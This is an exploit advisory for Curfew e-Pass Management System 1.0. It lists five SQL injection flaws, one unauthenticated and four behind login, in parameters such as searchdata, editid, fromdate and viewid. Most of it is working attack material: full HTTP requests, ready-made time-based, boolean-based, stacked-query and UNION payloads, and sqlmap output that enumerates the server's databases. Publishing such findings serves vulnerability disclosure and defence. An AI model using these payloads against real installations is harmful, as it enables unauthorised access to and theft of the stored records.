# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities # Google Dork: N/A # Date: 04.08.2020 # Exploit Author: Mucahit Karadag # Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661 # Version: 1.0 # Tested on: Ubuntu Server 14.04.6 LTS # CVE : N/A ### # Software Description: # Curfew Pass Management system is a web-based technology that will manage # the records of pass which issue by administrative. Curfew Pass Management # System is an automatic system that delivers data processing at a very high # speed in a systematic manner. # # Vulnerabilitiy Description: # Curfew e-Pass Management System 1.0 web application is vulnerable to # 5 different SQL injection vulnerabilities in multiple endpoints. # Vulnerabilities are listed in detail below. # # In summary, vulnerabilities are # Unauthenticated SQL Injection Identified on searchdata Parameter # Authenticated SQL Injection Identified on editid Parameter # Authenticated SQL Injection Identified on fromdate Parameter # Authenticated SQL Injection Identified on searchdata Parameter # Authenticated SQL Injection Identified on viewid Parameter ### ## ## [Unauthenticated SQL Injection Identified on searchdata Parameter] ## POST /cpms/index.php HTTP/1.1 Host: 12.0.0.163 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 22 Origin: http://12.0.0.163 DNT: 1 Connection: close Referer: http://12.0.0.163/cpms/index.php Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4 Upgrade-Insecure-Requests: 1 searchdata=&search= "searchdata" parameter is vulnerable to SQL injection under the search feature in the main page. Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search= Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search= --- [09:52:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.12 [09:52:10] [INFO] fetching database names available databases [5]: [*] cpms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin ## ## [Authenticated SQL Injection Identified on editid Parameter] ## GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1 Host: 12.0.0.163 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://12.0.0.163/cpms/admin/manage-category.php Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4 Upgrade-Insecure-Requests: 1 "editid" parameter is vulnerable to SQL injection on HTTP GET rquest to /admin/edit-category-detail.php endpoint. --- Parameter: editid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: editid=1 AND 4435=4435 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: editid=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- - --- [09:54:59] [INFO] testing MySQL [09:54:59] [INFO] confirming MySQL [09:54:59] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.0 [09:54:59] [INFO] fetching database names available databases [5]: [*] cpms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin ## ## [Authenticated SQL Injection Identified on fromdate Parameter] ## POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1 Host: 12.0.0.163 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://12.0.0.163 DNT: 1 Connection: close Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4 Upgrade-Insecure-Requests: 1 fromdate=2020-08-04&todate=2020-08-26&submit= --- Parameter: fromdate (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit= --- [09:58:36] [INFO] testing MySQL [09:58:36] [INFO] confirming MySQL [09:58:36] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.0 [09:58:36] [INFO] fetching database names [09:58:36] [INFO] fetching number of databases [09:58:36] [INFO] resumed: 5 [09:58:36] [INFO] resuming partial value: informat [09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done) do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [09:58:56] [INFO] adjusting time delay to 1 second due to good response times [09:59:37] [INFO] retrieved: cpms [09:59:37] [INFO] retrieved: information_schema [10:00:56] [INFO] retrieved: mysql [10:02:25] [INFO] retrieved: performance_schema [10:03:41] [INFO] retrieved: phpmyadmin available databases [5]: [*] cpms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin ## ## [Authenticated SQL Injection Identified on searchdata Parameter] ## POST /cpms/admin/search-pass.php HTTP/1.1 Host: 12.0.0.163 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 22 Origin: http://12.0.0.163 DNT: 1 Connection: close Referer: http://12.0.0.163/cpms/admin/search-pass.php Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4 Upgrade-Insecure-Requests: 1 searchdata=asd&search= --- Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search= Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search= --- [10:10:57] [INFO] testing MySQL [10:10:57] [WARNING] reflective value(s) found and filtering out [10:10:57] [INFO] confirming MySQL [10:10:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.0 [10:10:58] [INFO] fetching database names available databases [5]: [*] cpms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin ## ## [Authenticated SQL Injection Identified on viewid Parameter] ## GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1 Host: 12.0.0.163 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 --- Parameter: viewid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: viewid=3 AND 2054=2054 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- - --- [10:12:27] [INFO] testing MySQL [10:12:27] [INFO] confirming MySQL [10:12:28] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0.0 [10:12:28] [INFO] fetching database names available databases [5]: [*] cpms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin